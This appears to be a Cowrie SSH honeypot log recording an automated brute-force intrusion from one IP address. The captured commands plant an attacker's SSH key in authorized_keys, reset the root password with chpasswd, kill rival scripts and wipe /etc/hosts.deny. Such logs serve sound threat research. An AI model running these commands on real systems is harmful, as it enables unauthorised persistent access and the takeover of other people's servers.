{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:20:18.146646Z","src_ip":"212.227.235.229","session":"ce37ae4c1900"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:20:18.147635Z","src_ip":"212.227.235.229","session":"ce37ae4c1900"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:18.443130Z","src_ip":"212.227.235.229","session":"ce37ae4c1900"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49540,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d46ec349dbd","protocol":"ssh","message":"New connection: 212.227.235.229:49540 (1.2.3.4:22) [session: 5d46ec349dbd]","sensor":"my-vps","timestamp":"2025-09-08T22:20:18.985640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:20:18.986344Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:20:19.058962Z","src_ip":"212.227.235.229","session":"ce37ae4c1900"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:20:19.059875Z","src_ip":"212.227.235.229","session":"ce37ae4c1900"}
{"eventid":"cowrie.login.failed","username":"samsung","password":"111","message":"login attempt [samsung/111] failed","sensor":"my-vps","timestamp":"2025-09-08T22:20:19.240215Z","src_ip":"212.227.235.229","session":"40d2f6bf5c34"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:20:19.356586Z","src_ip":"212.227.235.229","session":"ce37ae4c1900"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:19.357548Z","src_ip":"212.227.235.229","session":"ce37ae4c1900"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38818,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2893428c7c0","protocol":"ssh","message":"New connection: 212.227.235.229:38818 (1.2.3.4:22) [session: d2893428c7c0]","sensor":"my-vps","timestamp":"2025-09-08T22:20:19.656313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:20:19.657504Z","src_ip":"212.227.235.229","session":"d2893428c7c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:20:19.956382Z","src_ip":"212.227.235.229","session":"d2893428c7c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52688,"dst_ip":"1.2.3.4","dst_port":22,"session":"cec7c969b034","protocol":"ssh","message":"New connection: 212.227.235.229:52688 (1.2.3.4:22) [session: cec7c969b034]","sensor":"my-vps","timestamp":"2025-09-08T22:20:20.141454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:20:20.142426Z","src_ip":"212.227.235.229","session":"cec7c969b034"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:20:20.191745Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:20:20.434149Z","src_ip":"212.227.235.229","session":"cec7c969b034"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:20.568028Z","src_ip":"212.227.235.229","session":"40d2f6bf5c34"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123321","message":"login attempt [root/abc123321] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:20:20.940252Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:20:21.191972Z","src_ip":"212.227.235.229","session":"d2893428c7c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:20:21.497175Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:20:21.497892Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:20:21.498891Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.login.failed","username":"centos","password":"12345","message":"login attempt [centos/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T22:20:21.641835Z","src_ip":"212.227.235.229","session":"cec7c969b034"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:21.747140Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:20:22.319660Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:20:22.320519Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:22.493265Z","src_ip":"212.227.235.229","session":"d2893428c7c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38832,"dst_ip":"1.2.3.4","dst_port":22,"session":"bae7b24e1c3b","protocol":"ssh","message":"New connection: 212.227.235.229:38832 (1.2.3.4:22) [session: bae7b24e1c3b]","sensor":"my-vps","timestamp":"2025-09-08T22:20:22.811461Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:20:22.812248Z","src_ip":"212.227.235.229","session":"bae7b24e1c3b"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:22.935252Z","src_ip":"212.227.235.229","session":"cec7c969b034"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:20:23.128203Z","src_ip":"212.227.235.229","session":"bae7b24e1c3b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:20:24.430321Z","src_ip":"212.227.235.229","session":"bae7b24e1c3b"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:24.740169Z","src_ip":"212.227.235.229","session":"ce37ae4c1900"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:24.745596Z","src_ip":"212.227.235.229","session":"bae7b24e1c3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49292,"dst_ip":"1.2.3.4","dst_port":22,"session":"630545575e78","protocol":"ssh","message":"New connection: 212.227.235.229:49292 (1.2.3.4:22) [session: 630545575e78]","sensor":"my-vps","timestamp":"2025-09-08T22:20:26.862417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:20:28.827394Z","src_ip":"212.227.235.229","session":"630545575e78"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:20:28.828325Z","src_ip":"212.227.235.229","session":"630545575e78"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:28.830802Z","src_ip":"212.227.235.229","session":"630545575e78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35714,"dst_ip":"1.2.3.4","dst_port":22,"session":"2add50e998b6","protocol":"ssh","message":"New connection: 212.227.235.229:35714 (1.2.3.4:22) [session: 2add50e998b6]","sensor":"my-vps","timestamp":"2025-09-08T22:20:33.337041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:20:33.398778Z","src_ip":"212.227.235.229","session":"2add50e998b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:20:33.637441Z","src_ip":"212.227.235.229","session":"2add50e998b6"}
{"eventid":"cowrie.login.failed","username":"sgp","password":"sgp@123","message":"login attempt [sgp/sgp@123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:20:34.624944Z","src_ip":"212.227.235.229","session":"2add50e998b6"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:35.831100Z","src_ip":"212.227.235.229","session":"2add50e998b6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:20:38.313998Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"16.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 16.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:38.314904Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:20:38.832413Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T22:20:38.833204Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:39.089135Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:20:39.701519Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.command.input","input":"echo \"root:ySlNjLfLnChI\"|chpasswd|bash","message":"CMD: echo \"root:ySlNjLfLnChI\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-08T22:20:39.702224Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/0d606af3cbfeb1cd44c9c1f85606f9d3da1446f8f5585174b88569b205c9a542","size":21,"shasum":"0d606af3cbfeb1cd44c9c1f85606f9d3da1446f8f5585174b88569b205c9a542","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/0d606af3cbfeb1cd44c9c1f85606f9d3da1446f8f5585174b88569b205c9a542 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:39.950550Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:20:41.541899Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-08T22:20:41.542610Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-08T22:20:41.795469Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
